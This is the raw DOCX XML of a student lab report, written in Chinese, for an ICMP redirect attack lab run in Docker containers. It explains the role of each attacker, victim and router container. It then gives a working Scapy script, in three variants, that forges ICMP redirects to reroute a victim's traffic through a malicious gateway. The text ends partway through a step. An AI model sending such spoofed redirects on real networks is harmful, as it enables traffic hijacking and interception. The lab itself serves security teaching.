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6CE356">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>ICMP Redirect Attack Lab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="609217C2">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋" w:eastAsia="仿宋"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋" w:eastAsia="仿宋"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>实验报告需求：按实验指导书按步执行，实验报告记录执行的命令，对执行结果截屏，并对指导书中提出的问题进行回答和截屏展示。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA65E04">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实验环境设置</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C71B8EA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5270500" cy="2540000"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="1991591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91742" name="图片 1"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId4"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5270500" cy="2540000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="01CFAD59">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>启动Docker，并进入docker环境,准备实验</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14:paraId="20C50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1739D5A0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>任务：启动docker并进入实验环境</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="466B2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41C2BEA6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>命令：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6718B640">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>c</w:t>
            </w:r>
            <w:r>
              <w:t>d Labsetup</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A14AE2F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>d</w:t>
            </w:r>
            <w:r>
              <w:t>cup</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="650903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734B3316">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>截图：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="16EB898F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="4936490" cy="2651760"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="594188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88669" name="图片 1"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId5"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4941718" cy="2654701"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="31E1C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25CC839C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">dockps </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="5EB15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15266FA4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>截图：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3DAE3198">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="5473700" cy="1280795"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="942042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42696" name="图片 1"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId6"/>
                          <a:srcRect l="38197" b="62469"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5502848" cy="1287839"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="76AB5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486210BA">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>说明各docker对应的作用</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4161E6D6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>attacker-10.9.0.105：这个容器通常是作为攻击者容器使用。在网络安全实验中，攻击者容器用于模拟发起攻击的主机。它可能会运行攻击脚本或工具，用于测试和演示各种攻击技术。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="539FE46A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>malicious-router-10.9.0.111：这个容器可能作为恶意路由器进行实验。它可能会用于模拟一个恶意网络设备，该设备可能会尝试进行一些不良行为，比如错误的路由通告，或者其他形式的网络攻击。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2BCB1571">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>host-192.168.60.6: 这个容器可能是实验环境中的一个主机，用于模拟网络中的一般主机。它可能用于测试网络连通性、服务响应或者其他网络行为。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="01DD5C45">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>host-192.168.60.5: 类似于 host-192.168.60.6，这个容器也是一个模拟主机，用于网络测试和验证。多个主机容器可以用于测试主机间的通信、服务发现等。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="198D0DEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>victim-10.9.0.5: 这个容器通常作为受害者容器使用。在安全实验中，受害者容器用于模拟被攻击的目标系统。它可以用来展示攻击对目标系统的影响，或验证攻击是否成功。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="544BAFFD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>router: 这个容器通常作为路由器进行实验。它可能用于模拟网络中的一个路由器，负责处理网络流量并进行路由选择。可以用于测试路由协议、网络配置等。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="25CA19D2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="554D5957">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13694676">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实验步骤</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C0C6E7">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>.1 Task 1: Launching ICMP Redirect Attack</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0"/>
      </w:tblGrid>
      <w:tr w14:paraId="3208FB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0" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="269B61F0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>任务：在在任务书要求完成攻击代码，观察路由表变化，以及MTR程序变化，并回答问题。在做实验时需要注意手册中strange</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>issue提到的问题并执行相应指令。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="22588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1DAE93C6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>命令：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="669992C6">
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:numPr>
              <w:ind w:firstLineChars="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>在victim上使用MTR程序，查看路由初始状态：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="12ECEFD7">
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:ind w:left="360" w:firstLine="0" w:firstLineChars="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>mtr -n 192.168.60.5</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F05EDC3">
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:numPr>
              <w:ind w:firstLineChars="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>在victim上使用ping命令验证：ping 192.168.60.5 &amp;（保持ping通状态）</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="520D759D">
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:numPr>
              <w:ind w:firstLineChars="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>编写icmp.py：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C400F0F">
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>#!/usr/bin/python3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="508E93DB">
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="08CB177F">
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>from scapy.all import *</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72511BEE">
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2CA96D87">
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>ip = IP(src = '10.9.0.11', dst = '10.9.0.5')</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7ADB9574">
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>icmp = ICMP(type=5, code=1)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="550172EF">
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>icmp.gw = '10.9.0.111'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="33A314F7">
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="12680EEA">
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t># The enclosed IP packet should be the one that</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D10EFEA">
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t># triggers the redirect message.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4DD0B3BB">
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>ip2 = IP(src = '10.9.0.5', dst = '192.168.60.5')</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="582F2D77">
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:ind w:left="360"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>send(ip/icmp/ip2/ICMP());</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="00BEF54D">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>4．在attacker上运行：icmp.py</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="71FD340E">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>5.再次查看路由状态（victim上）：mtr -n 192.168.60.5</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2FEC006E">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>6.修改程序icmp.py:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="67293174">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">  #!/usr/bin/python3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="325B2E4C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6F0BD673">
            <w:pPr>
              <w:ind w:firstLine="210" w:firstLineChars="100"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>from scapy.all import *</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="342EE680">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="064D858F">
            <w:pPr>
              <w:ind w:firstLine="210" w:firstLineChars="100"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>ip = IP(src = '10.9.0.11', dst = '10.9.0.5')</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6709763F">
            <w:pPr>
              <w:ind w:firstLine="210" w:firstLineChars="100"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>icmp = ICMP(type=5, code=1)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="710A2AAC">
            <w:pPr>
              <w:ind w:firstLine="210" w:firstLineChars="100"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>icmp.gw = '192.168.60.6'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E13F5E2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4ECC9A12">
            <w:pPr>
              <w:ind w:firstLine="210" w:firstLineChars="100"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t># The enclosed IP packet should be the one that</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A3F7C82">
            <w:pPr>
              <w:ind w:firstLine="210" w:firstLineChars="100"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t># triggers the redirect message.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="10984426">
            <w:pPr>
              <w:ind w:firstLine="210" w:firstLineChars="100"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>ip2 = IP(src = '10.9.0.5', dst = '192.168.60.5')</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="08EE7AAB">
            <w:pPr>
              <w:ind w:firstLine="210" w:firstLineChars="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>send(ip/icmp/ip2/ICMP());</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C3A7599">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>7. 保持victim ping 192.168.60.5：ping 192.168.60.5 &amp;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="499AF838">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>8.清空victim的cache：ip route flush cache</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="571919ED">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>9.在attacker上运行：icmp.py</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3536A1E1">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>10. 再次查看路由状态（victim上）：mtr -n 192.168.60.5</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A8EBF3E">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>11.修改程序icmp.py</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="567D4F04">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">   #!/usr/bin/python3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="204D3E32">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4E57D3AA">
            <w:pPr>
              <w:ind w:firstLine="315" w:firstLineChars="150"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>from scapy.all import *</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A5FEFE2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6D8283BF">
            <w:pPr>
              <w:ind w:firstLine="315" w:firstLineChars="150"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>ip = IP(src = '10.9.0.11', dst = '10.9.0.5')</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="43051DA3">
            <w:pPr>
              <w:ind w:firstLine="315" w:firstLineChars="150"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>icmp = ICMP(type=5, code=1)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="364EDBBE">
            <w:pPr>
              <w:ind w:firstLine="315" w:firstLineChars="150"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>icmp.gw = '10.9.0.99'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A50E696">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5CAAC4CF">
            <w:pPr>
              <w:ind w:firstLine="315" w:firstLineChars="150"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t># The enclosed IP packet should be the one that</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E4D1B82">
            <w:pPr>
              <w:ind w:firstLine="315" w:firstLineChars="150"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t># triggers the redirect message.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F2509B2">
            <w:pPr>
              <w:ind w:firstLine="315" w:firstLineChars="150"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>ip2 = IP(src = '10.9.0.5', dst = '192.168.60.5')</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2328F08F">
            <w:pPr>
              <w:ind w:firstLine="315" w:firstLineChars="150"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>send(ip/icmp/ip2/ICMP());</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B5DABFD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>12. 保持victim ping 192.168.60.5：ping 192.168.60.5 &amp;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="739BC021">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>13.清空victim的cache：ip route flush cache</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3926AD2C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>14.在attacker上运行：icmp.py</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D67CE0C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
